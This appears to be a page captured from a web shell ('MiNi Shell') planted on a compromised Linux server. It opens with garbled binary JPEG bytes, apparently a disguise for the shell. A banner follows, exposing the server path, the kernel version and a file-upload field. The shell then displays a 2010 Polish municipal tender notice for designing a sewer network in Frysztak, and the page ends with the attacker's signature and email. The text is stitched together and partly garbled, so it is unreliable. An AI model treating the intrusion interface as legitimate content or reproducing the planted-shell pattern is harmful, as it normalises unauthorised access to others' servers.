JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100729/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100729/202753-N-2010.html

<p class="kh_header"><b>Frysztak: Opracowanie projektu budowlanego sieci kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami , zasilaniem energetycznym przepompowni i przyłączami dla miejscowości Lubla i Widacz oraz części miejscowości Glinik Dolny , gmina Frysztak</b><br>
<b>Numer ogłoszenia: 202753 - 2010; data zamieszczenia: 29.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Frysztak , ul. Księdza Wojciecha Blajera 20, 38-130 Frysztak, tel. 017 27777110 w. 302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frysztak.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu budowlanego sieci kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami , zasilaniem energetycznym przepompowni i przyłączami dla miejscowości Lubla i Widacz oraz części miejscowości Glinik Dolny , gmina Frysztak.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opracowanie projektu budowlanego sieci kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami , zasilaniem energetycznym przepompowni i przyłączami dla miejscowości Lubla i Widacz oraz części miejscowości Glinik Dolny , gmina Frysztak , obejmujący:
1) Wykonanie map sytuacyjno -wysokościowych w skali 1:1000 do celów projektowych w tym :
a) 1 komplet  na matrycy z kalki technicznej 
b) 3 komplety odbitek z matrycy w formie papierowej 
c) 1 komplet na nośniku CD w formie DXF umożliwiający współpracę  z programami przeznaczonymi do projektowania komputerowego,
dla terenu objętego projektowaniem tj.wieś Lubla,Widacz, część wsi Glinik Dolny i Twierdza  - teren ogółem do 750 ha . 
Mapy należy wykonać  zgodnie z obowiązującymi przepisami prawa geodezyjnego i kartograficznego oraz instrukcjami branżowymi.
Matryca mapy podlega przekazaniu Zamawiającemu po wykorzystaniu przez Wykonawcę włącznie z kompletnym projektem budowlanym.
2).  Opracowanie projektu budowlanego sieci kanalizacji sanitarnej grawitacyjnej i tłocznej z przepompowniami , zasilaniem energetycznym przepompowni i przyłączami dla miejscowości Lubla i Widacz oraz części miejscowości Glinik Dolny , gmina Frysztak obejmujący:
a) Opracowanie oddzielnego projektu budowlanego dla miejscowości Widacz
b) Opracowanie oddzielnego projektu budowlanego dla miejscowości Lubla oraz części wsi Glinik Dolny.
Wykonane projekty budowlane muszą tworzyć jednolitą całość współpracującą ze sobą , pomimo ich wykonania jako oddzielnych opracowań, ponadto należy przewidzieć włączenie projektowanej sieci kanalizacyjnej do istniejącej sieci kanalizacji sanitarnej wsi Twierdza wraz z przeliczeniem mocy istniejących pompowni ścieków w tej miejscowości w celu zapewnienia prawidłowego jej funkcjonowania.  Projekty należy opracować na aktualnych podkładach geodezyjnych zgodnie z przepisami prawa budowlanego,dokumentacja powinna zawierać min. aktualne wypisy i wyrysy z ewidencji gruntów .
Orientacyjny zakres opracowania projektów budowlanych obejmuje zaprojektowanie:
                            -  do 500 szt. przyłączy do budynków 
                            - do 20 szt. przepompowni ścieków z zasilaniem energetycznym  
                            - do 60 km sieci kanalizacyjnej
3). Opracowanie  przedmiarów i kosztorysów inwestorskich dla zakresu robót objętych projektami w tym:
a) oddzielnego opracowania przedmiarów i kosztorysów inwestorskich dla sieci kanalizacyjnej wsi Widacz z przyłączeniem do istniejącej sieci kanalizacyjnej wsi Twierdza
b) oddzielnego opracowania przedmiarów i kosztorysów inwestorskich dla sieci kanalizacyjnej wsi Lubla oraz części wsi Glinik Dolny z przyłączeniem do istniejącej sieci kanalizacyjnej wsi Twierdza 
c) oddzielnego opracowania przedmiarów i kosztorysów inwestorskich dla przyłączy kanalizacyjnych wsi Widacz 
d) oddzielnego opracowania przedmiarów i kosztorysów inwestorskich dla przyłączy  kanalizacyjnych wsi Lubla i części wsi Glinik Dolny 
Definicja przyłącza zgodnie z art.2 ust.5 ustawy z dnia 7 czerwca 2001 roku o zbiorowym   zaopatrzeniu  w wodę i zbiorowym odprowadzaniu ścieków ( Dz.U. Z 2006 roku numer 123 poz. 858) - przyłącze kanalizacyjne- odcinek przewodu łączącego wewnętrzną instalację kanalizacyjną w nieruchomości odbiorcy usług  z siecią kanalizacyjną , za pierwszą studzienką , licząc od strony budynku, a w przypadku jej braku do granicy nieruchomości gruntowej.
4)  Opracowanie ogólnych i szczegółowych specyfikacji technicznych wykonania i odbioru robót .
5). Uzyskanie w imieniu Inwestora wszelkich wymaganych uzgodnień w tym także uzyskanie prawa do dysponowania gruntem na cele budowlane w formie umów cywilno - prawnych z właścicielami i zarządcami gruntów,
6).Przygotowanie niezbędnej dokumentacji do  uzyskania decyzji o środowiskowych uwarunkowaniach inwestycji, uzyskania decyzji  lokalizacji inwestycji celu publicznego ,  oraz  decyzji pozwolenia na budowę. Materiały do uzyskania decyzji o środowiskowych uwarunkowaniach inwestycji oraz decyzji lokalizacyjnej muszą zostać przedstawione na mapie ewidencyjnej gruntów i budynków w skali 1:2000 lub 1:1000 z wypisami z rejestru gruntów oraz wykazem działek biorących udział w postępowaniu  , danymi ich właścicieli   lub zarządców oraz danymi adresowymi.
7). Opracowanie na wniosek Zamawiającego ,wyciągu z dokumentacji technicznej (projekt i opis techniczny), który może być wymagany przy składaniu wniosku o przyznanie dofinansowania projektów  realizowanych w ramach środków UE.
8). Opracowanie niezbędnej dokumentacji geologiczno- inżynieryjnej dla projektowanych obiektów 
9). Opracowanie raportu oceny oddziaływania na środowisko projektowanej inwestycji o ile będzie wymagany.
10). Pełnienie nadzoru autorskiego nad realizacją zaprojektowanej inwestycji.  
11). Uzyskanie wszelkich uzgodnień w zakresie przekroczenia kanalizacją sanitarną cieków wodnych , włącznie z opracowaniem operatu do uzyskania decyzji pozwolenia wodno-prawnego.
12). Uzyskanie wszelkich uzgodnień oraz opracowanie dokumentacji do uzyskania decyzji w zakresie  przekroczenia siecią kanalizacji sanitarnej  dróg.
13) Opracowanie w zakresie przekroczenia drogi wojewódzkiej Babica-Warzyce  niezbędnej dokumentacji  w formie oddzielnego projektu zawierającego uzgodnienia  do uzyskania oddzielnego pozwolenia na budowę w tym zakresie.  
14) Opracować projekty wstępne - ZAMAWIAJĄCY  wymaga aby wykonanie projektów 
budowlanych zostało poprzedzone wykonaniem projektów wstępnych , których rozwiązania będą  opiniowane i uzgadniane przez ZAMAWIAJĄCEGO , co będzie podstawą do kontynuowania prac projektowych.
15) Opracować informację dotyczącą bezpieczeństwa i ochrony zdrowia w przypadkach 
gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5 000,00zł (słownie: pięć tysięcy  złotych 00/100) do dnia 10.08.2010 r. do godz. 10:30 w wybranej przez siebie formie dopuszczonej ustawą Prawo zamówień publicznych . Wadium musi być wniesione przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Prawo zamówień publicznych ,składa następujące dokumenty:
1) Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru,   
    w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt.2 ustawy ,   
    wystawione nie wcześniej niż 6  miesięcy  przed upływem terminu składania ofert, a w  
    stosunku do osób fizycznych oświadczenie w zakresie art.24.ust.1 pkt.2 ustawy.  
2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1   
     Prawa zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej  
  wiedzy i doświadczenia należy złożyć następujące dokumenty: 
1)Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami
   na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych
do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności , oraz informacją o podstawie do dysponowania tymi osobami , wraz z podaniem numeru uprawnień</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku  dysponowania osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
	1.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami
   na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych
do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności , oraz informacją o podstawie do dysponowania tymi osobami , wraz z podaniem numeru uprawnień.Za minimum Zamawiający uznaje wskazanie osób które  zapewnią wykonanie opracowań  specjalistycznych objętych umową przez osoby posiadające stosowne kwalifikacje zawodowe i  uprawnienia budowlane, tj.:
osoby wykonujące lub kierujące pracami nad poszczególnymi opracowaniami muszą posiadać uprawnienia do:
-opracowania map sytuacyjno-wysokościowych do celów projektowych
-projektowania   w zakresie sieci, instalacji i urządzeń sanitarnych 
-projektowania  w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
Ponadto osoby wykonujące czynności projektowe muszą przynależeć do Okręgowej Izby Inżynierów Budownictwa.
Wykonawca zobowiązany jest wskazać w ofercie, która z ww. osób będzie kierować pracami projektowymi.
2. W przypadku gdy w wykazie opisanym w pkt .1 Wykonawca wskazał osoby którymi będzie dysponował - obowiązany jest do wykazu dołączyć pisemne zobowiązanie  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dowód wniesienia wadium
2. Kosztorys ofertowy 
3.Wykaz części zamówienia które Wykonawca zamierza powierzyć  podwykonawcom , którzy będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat zakresu wykonywanych przez  nich czynności
4.Wykaz osób do kontaktu  
5.Parafowany wzór umowy  
6. Inne dokumenty i oświadczenia wynikające z zapisów SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian w umowie na poniższych warunkach:
1) w przypadku zmiany stawki podatku VAT przez władze ustawodawcza w trakcie trwania
umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku
akcyzowego,
2) w przypadku wystąpienia siły wyższej tj.
a) działania i zamieszki wojenne,
b) ataki terrorystyczne,
c)klęski  żywiołowe  spowodowane przez burze, huragany, tajfuny, trzęsienia ziemi, 
d)ekonomiczne następstwa globalnego kryzysu finansowego,
3)) działania niekorzystnych czynników atmosferycznych tj. okres niskich temperatur poniżej -10 stopni C, intensywnych opadów deszczu, śniegu ,gradu , wysokich temperatur pow. + 30 stopni C ,o czas okres udokumentowany przez Wykonawcę na podstawie prowadzonej ewidencji stanu pogody
4) związanej z koniecznością dokonania zmian projektowych w stosunku do projektu wstępnego i uzyskania odpowiednich zezwoleń i uzgodnień w tym decyzji o środowiskowych uwarunkowaniach inwestycji, decyzji lokalizacyjnej - o czas niezbędny do dokonania tych czynności -uniemożliwiających wykonanie zamówienia w terminie umownym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frysztak.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Frysztak ul.Ks.W.Blajera 20,38-130 Frysztak pokój. nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2010 godzina 10:30, miejsce: Urząd Gminy we Frysztaku ,  ul. Ks.W. Blajera 20, 38-130 Frysztak  pok. nr 8  (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com